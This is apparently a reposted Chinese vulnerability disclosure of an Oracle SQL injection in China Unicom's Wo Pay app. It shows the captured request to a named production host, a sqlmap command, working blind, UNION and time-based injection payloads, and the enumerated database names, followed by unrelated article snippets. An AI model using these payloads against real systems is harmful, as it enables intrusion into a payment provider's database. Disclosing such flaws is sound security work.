oracle注射,中国联通沃支付一处Oracle数据库注射
打开从豌豆荚应用商店下载的"沃支付"APP,抓包发现这么一条请求code 区域POST /payFront2/recommend.action?operation=CX10 HTTP/1.1
content-type: text/xml
Accept-Charset: GB2312
contentType: GB2312
SignatureCharacter: c691b17a0cf059741addc0a597ed1789f2593f0d
CookieSafeStr: -1|b12e9d62f3fd2fd5cc993b765fc47e28
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.2.2; virtual machine Build/JDQ39E)
Host: cellphonefront.unicompayment.com:55352
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 334
<?xml version="1.0" encoding="GB2312" standalone="yes" ?>2.1.0*0000000000000002CX10main
其中,2.1.0参数存在SQL注射。漏洞证明:
code 区域sqlmap.py -r e:\1.txt --force-ssl --skip-urlencode --dbs
code 区域sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: <?xml version="1.0" encoding="GB2312" standalone="yes" ?>2.1.0' AND 1553=1553 AND 'gdbh'='gdbh0000000000000002CX10main
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: <?xml version="1.0" encoding="GB2312" standalone="yes" ?>2.1.0' UNION ALL SELECT NULL,NULL,NULL,CHR(113)||CHR(111)||CHR(115)||CHR(105)||CHR(113)||CHR(72)||CHR(107)||CHR(72)||CHR(75)||CHR(84)||CHR(65)||CHR(72)||CHR(77)||CHR(86)||CHR(80)||CHR(113)||CHR(104)||CHR(98)||CHR(106)||CHR(113),NULL,NULL,NULL FROM DUAL-- 0000000000000002CX10main
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: <?xml version="1.0" encoding="GB2312" standalone="yes" ?>2.1.0' AND 6395=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'KtUw'='KtUw0000000000000002CX10main
---
back-end DBMS: Oracle
available databases [6]:
[*] CELLPHONE_FRONT
[*] EXFSYS
[*] MDSYS
[*] SYS
[*] SYSTEM
[*] XDB
修复方案:
联通更专业
oracle注射,中国联通沃支付一处Oracle数据库注射相关推荐
- Oracle 的成功无法复制,国产数据库该如何突破?
中国数据库发展的黄金期,开源开放才是最有效的手段. 整理 | 屠敏 出品 | CSDN(ID:CSDNnews) 互联网的发展打破了信息的隔阂,数据量的爆发催生了基础性软件数据库的应用.从中国数据库市 ...
- oracle实例包括用户进程吗,ORACLE实例和ORACLE数据库详解(三)
e.PMON:负责在一个Oracle进程失败时清理资源. 主要用于清除失效的用户进程,释放用户进程所用的资源.如PMON将回滚未提交的工作,释放锁,释放分配给失败进程的SGA资源. f.CKPT 同步 ...
- tomcat 连接oracle重连,JSP+Tomcat连接Oracle数据库
1. 首先安裝JDK 1.4.2_01 ,http://java.sun.com/j2se/2. 接著安裝Oracle9i, 安裝完成之後先更改XML Database的參數 ...
- Java JDBC连接oracle、SQL server、My Sql数据库的驱动
JAVA创建以JDBC连接数据库的程序 ①加载JDBC驱动程序: 1.oracle---------JDBC try{//加载oracle的驱动类Class.forName("oracle. ...
- oracle误删表空间 无法关闭,oracle 误删表空间文件启动不了数据库的解决办法
近日在搞rman备份恢复的实验,因为在虚拟机建立一个rman表空间,但是发现磁盘空间不够大,所以删除了,导致数据库启动不了了,解决办法如下: 1.误删rman表空间 SQL> ! rm -f / ...
- oracle 64位客户端_LabVIEW读取Oracle数据库-开题
最近做一个项目,工厂客户使用的Mes数据库是Oracle. 以前做医院摆药机系统时,和His对接用过Oracle数据库,主要用视图交互数据.然后,好久没有再使用过. 这次使用Oracle的时候,有几个 ...
- 数据如何导入oracle数据库,如何用Oracle导入导出工具来实现Oracle数据库移植?
Oracle数据库作为目前市场的主流数据库之一,许多应用都在其上进行开发,由于Oracle数据库更新换代的原因和不同的应用程序提供商,可能会造成在一个单位的应用中存在Oracle的几种版本,如Orac ...
- oracle转64编码,[转]将oracle数据库的编码变成utf-8
1.改客户端字符集:通过WINDOWS的运行菜单运行Regedit,修改注册表 Start -> Run -> Rededit Under registry Editor - > H ...
- oracle9i 恢复数据库,oracle 9i使用闪回查询恢复数据库误删问题
如果用户误删/更新了数据后,作为用户并没有什么直接的方法来进行恢复,他们必须求助DBA来对数据库进行恢复,到了Oracle9i,这一个难堪局面有所改善.Oracle 9i中提供了一项新的技术手段--闪 ...
- oracle 导库时日志满了,oracle rac 11g 日志占满系统盘导致数据库down掉
oracle日志占满系统盘满了导致数据库挂掉 并且archivelog日志也满了倒是数据库无法open,无法登陆,幸好还可以到mount状态.解决办法: 1.根据报错查看 表象: crs 服务down ...
最新文章
- TP5的目录常量和路径
- noip模拟赛 遭遇
- 分布式部署携程Apollo构建配置中心
- PHP导出成word文档
- python多线程url采集器 + github_python实现多线程采集的2个代码例子
- 三星智能共享计算机软件,Samsung Smart View
- 微信开发者工具 ETIMEDOUT
- 解决Mac系统更新后,SVN无法使用的问题
- MyIM服务端聊天记录(网络编程作业)
- Mysql中的循环语句
- ZeroMemory、memset 和 “={0}” 三者区别
- 计算机网络第六章 链路层和局域网
- python爬虫——爬取拉勾上的职位信息
- Ubuntu IOS镜像文件下载
- ping 不通。无法访问目标主机
- 已知某一点坐标、线段长度和旋转角度,求另一点坐标
- 交叉连接(CROSS JOIN)
- bootstrap$核心对象数据不一致导致ORA-08102
- 08年6月PMP(京沪)开课及试听通知
- 【每日新闻】360退出手机领域,周鸿祎又一次梦碎